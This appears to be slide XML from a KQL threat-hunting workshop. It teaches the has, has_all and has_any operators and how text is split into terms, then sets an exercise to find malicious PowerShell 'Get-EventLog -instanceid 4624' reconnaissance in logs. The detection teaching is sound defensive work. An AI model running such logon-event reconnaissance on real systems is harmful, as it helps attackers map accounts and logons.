              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>instanceid</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>4624</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>But are these unique enough to focus on just the malicious activity amongst all the noise?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>4624</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is highly unique! It is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>perfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> blend of being absolutely necessary for the command to work (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>invariant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>), but also very specific to this malicious activity, when used with Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>EventLog</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2950105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50F31C-0219-4877-9CA1-B2126E77F32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CB70B5-B8FC-F339-DB0B-71ACBE4869E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let’s hunt for this in KQL - introducing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>has</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F3344D1-AB8D-7F16-D4D0-99B29ED1EBF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1"/>
              <a:t>Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t> searches a field for text:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>TableName</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>| where SomeField contains “thisText”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t> needs to be reused for each new text string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1"/>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t> series of operators allow for multiple searches:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>TableName</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>| where SomeField has_all (“thisText”,”alsoThisText”,”OneMore”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1"/>
              <a:t>Has_all()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t> requires all the strings for a match</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1"/>
              <a:t>Has_any()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t> only requires any one of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t>However, to do this, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1"/>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000"/>
              <a:t> matches text in a specific way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1884529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8F94A-2FD7-853F-509F-077A0736D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E4657E-4BDE-F244-5B8A-7F7A85325607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>Has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> matches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>terms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> only</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F68C3B-EDA9-C5BD-CFE0-B4F29548B1B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338292" y="1690688"/>
            <a:ext cx="11515415" cy="1272935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="008000"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808000"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msedge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="008080"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF00FF"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="008080"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Aptos Mono" panose="020F0502020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>disabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C2E4A32-C6F5-9E3F-83E7-A98BD88C402D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2905366"/>
            <a:ext cx="10515600" cy="39526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To make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> really fast, KQL splits up text into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>terms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is any group of alphanumeric characters – letters and numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This is actually very intuitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> search for half a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" i="1" dirty="0"/>
              <a:t>term</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>You do not have to search for terms exactly, e.g. … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> “\msedge.exe”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>is fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>But if you split a term in half, it won’t match e.g. … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>has</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> “--type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>gpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-proc”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This is the only restriction you must keep in mind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66012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77647E-2581-F55E-6EC5-E8C60436F4BB}"/>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Animated Wall Clock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6D12FA-346A-DD4A-B585-2B3C2D5D7118}"/>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a:fill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72219D-B17E-9270-3313-EBC6BB4B8E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321733" y="554845"/>
            <a:ext cx="10656891" cy="3902673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Workshop time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1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1C3F31A-9F18-9F53-0723-BA2522FD466A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315523" y="4718033"/>
            <a:ext cx="10678296" cy="1175039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go hunt for the Get-EventLog activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383422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276D5-3978-2CE1-EF4A-678CD398E9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A8AB31-D969-20D6-BAAC-4834074CF0C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Hunt target:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB69197-449E-F36E-92E0-90B8CC6F1D3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="4049376"/>
            <a:ext cx="10606687" cy="2500280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" err="1"/>
              <a:t>has_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> operator to filter your logs for only the malicious activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Make sure you split the text strings up! There could be extra spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>Don’t do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0" err="1"/>
              <a:t>has_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>“Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>EventLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>”,”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0" err="1"/>
              <a:t>instanceid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" u="sng" dirty="0"/>
              <a:t> 4624</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>You’ll only match on exactly one space!</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE3949C-CA9D-F86E-C1FA-E4A3C9108FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472963" y="1311560"/>
            <a:ext cx="9246073" cy="2737816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
